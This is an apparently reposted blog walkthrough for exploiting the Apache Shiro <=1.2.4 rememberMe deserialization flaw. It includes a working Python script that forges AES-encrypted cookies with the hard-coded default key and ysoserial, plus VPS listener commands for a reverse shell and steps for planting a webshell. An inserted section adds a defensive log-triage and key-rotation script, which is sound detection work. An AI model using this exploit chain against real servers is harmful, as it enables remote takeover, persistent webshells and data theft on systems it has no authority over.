Apache Shiro deserialization remote code execution reproduction

Affected version

Apache Shiro <= 1.2.4

Components used

org.apache.commons commons-collections4 (in theory commons-collections2 also works)

Injection point

The rememberMe cookie of any HTTP request

[Figure: injection point]

Difficulties building the environment

Compiling Shiro with Maven has many pitfalls; since it was so painful, I list the main ones:

1. The machine needs the mvn and svn commands installed
2. JDK 1.6 is recommended
3. Maven 3.1.1 is the best version

With the environment requirements above addressed, compilation basically will not fail.
If you fail to compile and are not confident, you can use the war package I provide:
https://pan.baidu.com/s/1dSHR21IQbrLHpaSQ1TI23A extraction code: zg4h
Deploying the war package is very simple: just put it in Tomcat's webapps directory and it will be unpacked automatically. Its default name is samples-web-1.2.4; to make it easier to access we can rename it to shiro.

[Figure: shiro]

Exploitation steps

The environment is ready to use.
[Figure: operating environment]

You need to place ysoserial on a public-network VPS and use it together with the following Python script.

shiro_exp_payload.py

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES


def encode_rememberme(command):
    # ysoserial builds the serialized JRMPClient object that points at the listener
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    # PKCS#7 padding to the AES block size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # hard-coded default rememberMe key shipped with Shiro <= 1.2.4
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    # the cookie value is base64(IV || AES-CBC ciphertext), the layout Shiro expects
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print("rememberMe={0}".format(payload.decode()))
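Added example, not from the original post and not Shiro's or ysoserial's code: a defender-side triage helper in Python that runs the cookie scheme above in reverse (base64, 16-byte IV, AES-CBC, PKCS#7) to answer the question the injection point and the script together raise for any Shiro deployment: does a rememberMe cookie seen in a request decrypt under the hard-coded default key to a Java serialization stream? If it does, the server is still on the shipped key and every such cookie is forgeable; if the decrypted object is far larger than a normal principal collection, it has the shape of a gadget-chain payload. The same block produces a random replacement key as the mitigation. The pycryptodome/cryptography fallback, the log-line format, the 1024-byte size threshold, all function names and every sample cookie are assumptions constructed here.

```python
import base64
import os
import re

# AES-CBC from pycryptodome (what the page's script imports) or, failing that, from the
# "cryptography" package; which one is installed is an assumption about the local machine.
try:
    from Crypto.Cipher import AES as _AES

    def _aes_cbc(key, iv, data, encrypt):
        c = _AES.new(key, _AES.MODE_CBC, iv)
        return c.encrypt(data) if encrypt else c.decrypt(data)
except ImportError:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc(key, iv, data, encrypt):
        op = Cipher(algorithms.AES(key), modes.CBC(iv))
        op = op.encryptor() if encrypt else op.decryptor()
        return op.update(data) + op.finalize()

BS = 16
# Hard-coded default rememberMe key shipped with Shiro <= 1.2.4 (the key used on the page).
DEFAULT_KEY = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
# Every Java serialization stream begins with these four magic bytes.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
# Assumed log format: the raw cookie value follows "rememberMe=" (see the note on URL-encoding).
COOKIE_RE = re.compile(r"rememberMe=([A-Za-z0-9+/=]+)")


def pkcs7_unpad(data):
    """Strip PKCS#7 padding; None if the padding is invalid (wrong key or garbage)."""
    if not data or len(data) % BS:
        return None
    n = data[-1]
    if not 1 <= n <= BS or data[-n:] != bytes([n]) * n:
        return None
    return data[:-n]


def decrypt_rememberme(cookie_value, key=DEFAULT_KEY):
    """Reverse of the page's scheme: base64 -> IV || ciphertext -> AES-CBC -> unpad.
    Returns plaintext bytes, or None if the value is not a valid ciphertext under `key`."""
    try:
        raw = base64.b64decode(cookie_value, validate=True)
    except ValueError:
        return None
    if len(raw) < 2 * BS or len(raw) % BS:
        return None
    return pkcs7_unpad(_aes_cbc(key, raw[:BS], raw[BS:], encrypt=False))


def classify_rememberme(cookie_value, key=DEFAULT_KEY, size_threshold=1024):
    """Triage one rememberMe value from a request.
    'default-key': decrypts under `key` to a Java serialization stream, so the server is
                   still on a key anyone can look up and the cookie is forgeable;
    'oversized':   the same, but far larger than a normal PrincipalCollection, which is
                   the shape of a gadget-chain payload;
    'opaque':      not decryptable with `key` (custom key, or unrelated data).
    The 1024-byte threshold is a constructed starting point, not a Shiro constant."""
    plain = decrypt_rememberme(cookie_value, key)
    if plain is None or not plain.startswith(JAVA_STREAM_MAGIC):
        return "opaque"
    return "oversized" if len(plain) > size_threshold else "default-key"


def scan_log(lines, key=DEFAULT_KEY):
    """Return (line_number, verdict) for every log line carrying a rememberMe cookie."""
    found = []
    for number, line in enumerate(lines, 1):
        match = COOKIE_RE.search(line)
        if match:
            found.append((number, classify_rememberme(match.group(1), key)))
    return found


def generate_cipher_key():
    """Mitigation: a fresh random 128-bit key, base64-encoded for setCipherKey(Base64.decode(..))."""
    return base64.b64encode(os.urandom(BS)).decode()


def encrypt_for_sample(plaintext, key=DEFAULT_KEY):
    """Forward direction of the same scheme, used only to build the constructed samples below."""
    iv = os.urandom(BS)
    n = BS - len(plaintext) % BS
    return base64.b64encode(iv + _aes_cbc(key, iv, plaintext + bytes([n]) * n, True)).decode()


# Constructed sample log lines (not real traffic): a small serialized object under the default
# key, a large one of gadget-chain size, and one encrypted under a different key.
SAMPLE_LOG = [
    'GET /shiro/ 200 "rememberMe=%s"' % encrypt_for_sample(JAVA_STREAM_MAGIC + b"small constructed object"),
    'GET /shiro/ 200 "rememberMe=%s"' % encrypt_for_sample(JAVA_STREAM_MAGIC + b"\x00" * 3000),
    'GET /shiro/ 200 "rememberMe=%s"' % encrypt_for_sample(JAVA_STREAM_MAGIC + b"other key", key=b"\x01" * BS),
]

if __name__ == "__main__":
    for number, verdict in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (number, verdict))
    print("replacement cipherKey (base64):", generate_cipher_key())
```

Real access logs usually URL-encode the cookie (`=` becomes `%3D`), so unquote the value before matching. A `default-key` verdict on any cookie is already the finding: the fix is a per-deployment key passed to AbstractRememberMeManager.setCipherKey (which logs out everyone currently remembered, so plan the rotation), and upgrading past 1.2.4, where Shiro stopped shipping a fixed key. Shiro answers a cookie it cannot decrypt with Set-Cookie: rememberMe=deleteMe, so a burst of such responses to many distinct cookie values is the server-side trace of someone trying keys against the application.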
Executing commands

1. First is the reverse shell command execution
2. Run the following command on the VPS
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "reverse shell command"

The command here needs to use the Java Runtime bash encoding; CommonsCollections4 can also be replaced with CommonsCollections2.
3. Use the Python script
python shiro_exp_payload.py vpsip:1099
The Python script will generate a cookie; put the cookie into your HTTP request to get the reverse shell,
as in the following figure.

[Figure: access with the cookie]

[Figure: reverse shell]

[Figure: reverse shell]

(I give a reverse shell here; of course you can also use echo to write a shell or something similar, just replace the reverse shell command with the command that writes the shell.)

The path for writing the shell can be determined with reference to the following figure.

[Figure: shell write path]
[Figure: webshell]

Reproduced from: https://www.jianshu.com/p/c0cb65667145

Origin blog.csdn.net/weixin_34040079/article/details/91268594